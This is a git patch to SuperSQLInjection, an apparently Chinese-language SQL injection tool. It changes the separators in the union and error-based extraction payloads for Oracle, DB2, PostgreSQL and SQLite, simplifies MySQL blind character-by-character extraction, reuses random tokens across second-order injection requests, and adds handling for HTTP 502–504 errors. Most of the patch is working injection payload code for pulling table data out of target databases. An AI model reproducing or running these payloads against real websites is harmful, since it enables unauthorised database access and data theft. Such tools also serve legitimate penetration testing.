From c89bc8f235d362c9d853c95694bbf769532c1aa2 Mon Sep 17 00:00:00 2001 From: shack2 Date: Wed, 27 May 2020 11:37:39 +0800 Subject: [PATCH] =?UTF-8?q?=E6=9B=B4=E6=96=B0=E5=88=86=E9=9A=94=E7=AC=A6?= =?UTF-8?q?=E9=97=AE=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- SuperSQLInjection/Main.cs | 57 +++++++---------------- SuperSQLInjection/bypass/StringReplace.cs | 19 +++++++- SuperSQLInjection/payload/Comm.cs | 4 +- SuperSQLInjection/payload/DB2.cs | 2 +- SuperSQLInjection/payload/Informix.cs | 2 +- SuperSQLInjection/payload/Oracle.cs | 4 +- SuperSQLInjection/payload/PostgreSQL.cs | 6 +-- SuperSQLInjection/payload/SQLite.cs | 2 +- SuperSQLInjection/tools/Tools.cs | 2 +- SuperSQLInjection/tools/http/HTTP.cs | 23 ++++++--- 10 files changed, 61 insertions(+), 60 deletions(-) diff --git a/SuperSQLInjection/Main.cs b/SuperSQLInjection/Main.cs index 2abf957..44d0c3c 100644 --- a/SuperSQLInjection/Main.cs +++ b/SuperSQLInjection/Main.cs @@ -286,7 +286,7 @@ namespace SuperSQLInjection responseStream.Close(); } - public static int version = 20200209; + public static int version = 20200527; public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(Tools.getSystemSid()) + "&VERSION=" + version; //检查更新 public void checkUpdate() @@ -792,10 +792,8 @@ namespace SuperSQLInjection this.txt_log.Invoke(new showLogDelegate(log), "发出停止线程信号!", LogLevel.info); stp.Cancel(); this.currentThread.Abort(); - } status = 0; - } public void getVariablesByUnion(DBType dbType) @@ -2710,11 +2708,9 @@ namespace SuperSQLInjection { //2分法获取中间数字 mid = Tools.getLargeNum(start, end); - payload = ByPassForBetween(payLoadStr, mid); ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet); Boolean exists = Tools.isTrue(server, config.key, config.reverseKey, config.keyType, config.injectHTTPCode); - if (end == start) { if (exists) @@ -2723,9 +2719,7 @@ namespace SuperSQLInjection } else { - return end; - } } if (exists) @@ -5141,47 +5135,21 @@ namespace SuperSQLInjection String va_payload = MySQL.ver_value.Replace("{data}", data_payload); String colvalue = ""; - //获取值 for (int i = 1; i <= len; i++) { - String tmp_va_payload = MySQL.ord_value.Replace("{data}", data_payload).Replace("{index}", i + ""); - String plen = MySQL.ver_length.Replace("{data}", tmp_va_payload); - int mu_payload_len = 0; - //MySQL多字节ord,先判断ord后的长度,在取每一个的值 + String tmp_va_payload = va_payload.Replace("{index}", i + ""); + int ascii = 0; if (config.keyType.Equals(KeyType.Time)) { - mu_payload_len = getValue(MySQL.getBoolDataBySleep(MySQL.char_len.Replace("{data}", tmp_va_payload), config.maxTime), 2, 8); + ascii = getValue(tmp_va_payload, 0, 127); } else { - mu_payload_len = getValue(plen, 2, 8); + ascii = getValue(tmp_va_payload, 0, 127); } - - //判断ord转换后的字符长度 - - int m_index = 1; - String[] ver_tmp = new String[mu_payload_len]; - while (m_index <= mu_payload_len) - { - - int ascii = 0; - if (config.keyType.Equals(KeyType.Time)) - { - ascii = getValue(MySQL.getBoolDataBySleep(MySQL.mid_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), config.maxTime), 0, 9); - } - else - { - ascii = getValue(MySQL.bool_ord_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), 0, 9); - } - ver_tmp[m_index - 1] = ascii + ""; - m_index++; - } - //设置值,这里由于是hex值,需要转换 - String hexstring = Tools.convertToString(ver_tmp); - String hexvalue = Convert.ToString(int.Parse(hexstring), 16); - colvalue += Tools.unHex(hexvalue, config.db_encoding); - + colvalue += ((char)ascii).ToString(); } + if (lvi == null) { lvi = new ListViewItem(colvalue); @@ -6043,6 +6011,7 @@ namespace SuperSQLInjection GetDataPam gp = (GetDataPam)opam; ListViewItem lvi = new ListViewItem(); String result = getOneDataByUnionOrError(SQLServer.getErrorDataValue(gp.dbname, gp.table, gp.limit, gp.columns)); + result = HttpUtility.HtmlDecode(result); //数结果改成xml格式,单独解析 addItemToListViewBySQLServerXMLData(result, gp.columns); @@ -10804,7 +10773,15 @@ namespace SuperSQLInjection private void btn_inject_randStr_Click(object sender, EventArgs e) { - this.txt_inject_request.SelectedText = "" + this.txt_inject_request.SelectedText + ""; + if (this.txt_inject_request.SelectedText.Length > 0) + { + this.txt_inject_request.SelectedText = "" + this.txt_inject_request.SelectedText + ""; + + } + if (this.txt_sencond_request.SelectedText.Length > 0) + { + this.txt_sencond_request.SelectedText = "" + this.txt_sencond_request.SelectedText + ""; + } } private void txt_sencond_request_TextChanged(object sender, EventArgs e) diff --git a/SuperSQLInjection/bypass/StringReplace.cs b/SuperSQLInjection/bypass/StringReplace.cs index bf947a0..41be66e 100644 --- a/SuperSQLInjection/bypass/StringReplace.cs +++ b/SuperSQLInjection/bypass/StringReplace.cs @@ -11,10 +11,25 @@ namespace SuperSQLInjection.bypass { class StringReplace { - public static String strReplaceCenter(Config config, String request, Hashtable replaceList) + public static String lastRand = ""; + public static String lastpayload = ""; + public static String strReplaceCenter(Config config, String request, Hashtable replaceList,String payload) { //修改随机值 - request = Regex.Replace(request, "(\\[.\\s\\S]*?\\<\\/Rand\\>)", System.Guid.NewGuid().ToString("N")); + String rand = ""; + if (payload.Equals(lastpayload)) { + rand = lastRand; + } + else { + rand = System.Guid.NewGuid().ToString("N"); + } + + if (payload.Equals("请求二次注入页面")) { + rand = lastRand; + } + request = Regex.Replace(request, "(\\[.\\s\\S]*?\\<\\/Rand\\>)", rand); + lastRand = rand; + lastpayload = payload; //找到需要处理的字符 MatchCollection mc = Regex.Matches(request, "(?<=(\\))[.\\s\\S]*?(?=(\\<\\/Encode\\>))"); String str=""; diff --git a/SuperSQLInjection/payload/Comm.cs b/SuperSQLInjection/payload/Comm.cs index 4f6fb3d..63b8645 100644 --- a/SuperSQLInjection/payload/Comm.cs +++ b/SuperSQLInjection/payload/Comm.cs @@ -8,8 +8,8 @@ namespace SuperSQLInjection.payload class Comm { - public const String COLUMNS_SPLIT_STR = "$_$"; - public const String COLUMNS_REG_SPLIT_STR = "\\$_\\$"; + public const String COLUMNS_SPLIT_STR = "$\t$"; + public const String COLUMNS_REG_SPLIT_STR = "\\$\\t\\$"; public static String COLUMNS_SPLIT_HEX_STR = Tools.strToHex(COLUMNS_SPLIT_STR, "UTF-8"); public static String exists_table = " exists(select 1 from {0})"; diff --git a/SuperSQLInjection/payload/DB2.cs b/SuperSQLInjection/payload/DB2.cs index b1f67e9..135bbd9 100644 --- a/SuperSQLInjection/payload/DB2.cs +++ b/SuperSQLInjection/payload/DB2.cs @@ -82,7 +82,7 @@ namespace SuperSQLInjection.payload public static String getUnionDataValue(String unionFileTemplate, List columns, String dbname, String table, String index) { - String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; + String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; String template= unionFileTemplate.Replace("{data}", (data_no_cast_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index))); return union_value.Replace("{data}", template); } diff --git a/SuperSQLInjection/payload/Informix.cs b/SuperSQLInjection/payload/Informix.cs index 264c1ef..559a09a 100644 --- a/SuperSQLInjection/payload/Informix.cs +++ b/SuperSQLInjection/payload/Informix.cs @@ -38,7 +38,7 @@ namespace SuperSQLInjection.payload public static String substr = "substr(({data})),{index},1)"; //多字节 - public static String hex_value = "ascii({data})"; + //public static String hex_value = "ascii({data})"; //bool方式字符长度判断 public static String bool_length = " length(({data}))>{len}"; diff --git a/SuperSQLInjection/payload/Oracle.cs b/SuperSQLInjection/payload/Oracle.cs index 50d56a5..a9f6386 100644 --- a/SuperSQLInjection/payload/Oracle.cs +++ b/SuperSQLInjection/payload/Oracle.cs @@ -91,7 +91,7 @@ namespace SuperSQLInjection.payload public static String getUnionDataValue(int columnsLen, int showIndex, List columns, String dbname, String table, String index) { StringBuilder sb = new StringBuilder(); - String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; + String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; for (int i = 1; i <= columnsLen; i++) { if (i == showIndex) @@ -163,7 +163,7 @@ namespace SuperSQLInjection.payload public static String getDataValue(List columns, String dbName, String table, String index) { StringBuilder sb = new StringBuilder(); - String data = Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||"); + String data = Comm.unionColumns(columns, "||chr(36)||chr(9)||chr(36)||"); sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index)); sb.Append(","); sb.Remove(sb.Length - 1, 1); diff --git a/SuperSQLInjection/payload/PostgreSQL.cs b/SuperSQLInjection/payload/PostgreSQL.cs index a08e641..ec87195 100644 --- a/SuperSQLInjection/payload/PostgreSQL.cs +++ b/SuperSQLInjection/payload/PostgreSQL.cs @@ -81,7 +81,7 @@ namespace SuperSQLInjection.payload //error方式 public static String error_value = " 1=cast((chr(94)||chr(94)||chr(33)||({data})||chr(33)||chr(94)||chr(94)) as numeric)"; - public static String hex = "(select hex({data}))"; + //public static String hex = "(select hex({data}))"; public static String hex_value = "(select hex(convert(({data}) using UTF8)))"; public static String substr_value = "(select substr({data},{start},{len}))"; @@ -126,7 +126,7 @@ namespace SuperSQLInjection.payload /// 第几行数据,1开始 public static String getErrorDataValue(String dbname, String table, int index, List columns) { - String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(36)||chr(36)||")); + String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(9)||chr(36)||")); String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index.ToString()); return error_value.Replace("{data}", d); } @@ -179,7 +179,7 @@ namespace SuperSQLInjection.payload public static String getUnionDataValue(int columnsLen, int showIndex, List columns, String dbname, String table, String index) { StringBuilder sb = new StringBuilder(); - String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; + String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; for (int i = 1; i <= columnsLen; i++) { if (i == showIndex) diff --git a/SuperSQLInjection/payload/SQLite.cs b/SuperSQLInjection/payload/SQLite.cs index 13fc760..d3e933d 100644 --- a/SuperSQLInjection/payload/SQLite.cs +++ b/SuperSQLInjection/payload/SQLite.cs @@ -52,7 +52,7 @@ namespace SuperSQLInjection.payload public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, List columns, String table, String index) { StringBuilder sb = new StringBuilder(); - String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(36)||char(36)||") + "||char(33)||char(94)||char(94)"; + String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(9)||char(36)||") + "||char(33)||char(94)||char(94)"; for (int i = 1; i <= columnsLen; i++) { if (i == showIndex) diff --git a/SuperSQLInjection/tools/Tools.cs b/SuperSQLInjection/tools/Tools.cs index c2ab5bb..fd07259 100644 --- a/SuperSQLInjection/tools/Tools.cs +++ b/SuperSQLInjection/tools/Tools.cs @@ -498,7 +498,7 @@ namespace tools case KeyType.Time: - //由于计数器有误差(可能客户端计数小于服务端,,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值) + //由于计数器有误差(可能客户端计数小于服务端,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值) int time = Tools.convertToInt(key); if (server.runTime > (time*1000-(time*deviation))) { diff --git a/SuperSQLInjection/tools/http/HTTP.cs b/SuperSQLInjection/tools/http/HTTP.cs index afbb5cc..49c5412 100644 --- a/SuperSQLInjection/tools/http/HTTP.cs +++ b/SuperSQLInjection/tools/http/HTTP.cs @@ -42,7 +42,7 @@ namespace SuperSQLInjection.tools public const int WaitTime = 5; public static Main main = null; public static long index = 0; - + public static String LastToken =""; public const String Socks5ProxyType = "Socks5"; public static String getTemplate = "GET /mysql.jsp?id=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\r\nAccept-Encoding: gzip, deflate\r\nHost: 127.0.0.1:8090\r\nConnection: Close\r\nCookie: JSESSIONID=2F6D5F1AC8C376FF0AB48A08282A6CED"; @@ -82,6 +82,7 @@ namespace SuperSQLInjection.tools { ServerInfo tserver = HTTP.sendRequestRetryNoToken(isSSL, tryCount, host, port, "获取Token", main.config.token_request, timeout, encoding, foward_302, redirectDoGet); token = Tools.substr(tserver.body, main.config.token_startStr, main.config.token_endStr); + } request = Regex.Replace(request, "(\\[.\\s\\S]*?\\<\\/Token\\>)", token); } @@ -338,7 +339,7 @@ namespace SuperSQLInjection.tools if (port > 0 && port <= 65556) { request = request.Replace(Main.setInjectStr, payload); - request = StringReplace.strReplaceCenter(main.config, request, main.replaceList); + request = StringReplace.strReplaceCenter(main.config, request, main.replaceList,payload); //编码处理 server.request = request; @@ -483,11 +484,15 @@ namespace SuperSQLInjection.tools return sendHTTPRequest(count, host, port, payload, rsb.ToString(), timeout, encoding, false, redirectDoGet); } + } + //超时 + if (server.code >501&&server.code <505) + { + throw new Exception("http访问异常-code:"+ server.code+"!"); } - - //根据请求头解析 - if (server.headers.ContainsKey(Content_Length)&& server.header.IndexOf(Content_Length_Zero) ==-1) + //根据请求头解析 + if (server.headers.ContainsKey(Content_Length)&& server.header.IndexOf(Content_Length_Zero) ==-1) { int length = int.Parse(server.headers[Content_Length]); while (sum < length && sw.ElapsedMilliseconds <= timeout) @@ -764,7 +769,7 @@ namespace SuperSQLInjection.tools request = request.Replace(Main.setInjectStr, payload); //编码处理 - request = StringReplace.strReplaceCenter(main.config, request, main.replaceList); + request = StringReplace.strReplaceCenter(main.config, request, main.replaceList,payload); TimeOutSocket tos = new TimeOutSocket(); if (main.config.proxy_mode == 1 || main.config.proxy_mode == 2) { @@ -920,7 +925,11 @@ namespace SuperSQLInjection.tools } - + //超时 + if (server.code > 501 && server.code < 505) + { + throw new Exception("http访问异常-code:" + server.code + "!"); + } //根据请求头解析 if (server.headers.ContainsKey(Content_Length) && server.header.IndexOf(Content_Length_Zero) == -1)